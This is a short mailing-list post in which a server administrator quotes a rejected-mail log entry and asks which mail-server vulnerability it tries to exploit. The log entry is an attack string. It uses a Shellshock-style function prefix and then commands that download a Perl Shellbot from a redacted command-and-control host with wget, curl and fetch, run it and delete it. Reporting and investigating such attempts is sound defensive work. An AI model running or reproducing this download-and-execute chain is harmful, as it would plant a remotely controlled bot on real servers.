Attempted mail attack

Go to: [ bottom of page ] [ top of archives ] [ this month ]

From: Andrea Venturoli <ml_at_netfence.it>
Date: Sun, 11 Jun 2023 11:38:58 UTC

Hello.

Checking daily periodics of different servers, I'm seeing a variation of 
this:

> Checking for rejected mail hosts:
>    1 553 check_mail () { :; }; cd /tmp;wget x.y.z.w5/meh;perl meh;curl -O x.y.z.w/meh;perl meh;fetch http://x.y.z.w/meh;perl meh;rm -f meh* {:;};cd/tmp;wget.x.y.z.w/meh;...

(I've redacted the C&C IP, even if it's already down).

Of course they are attempting to download a Perl Shellbot (and failing).
I'm curious, though, what vulnerability they are trying to exploit in 
order to do this?
Is it some old one in sendmail? Or what?

  bye & Thanks
	av.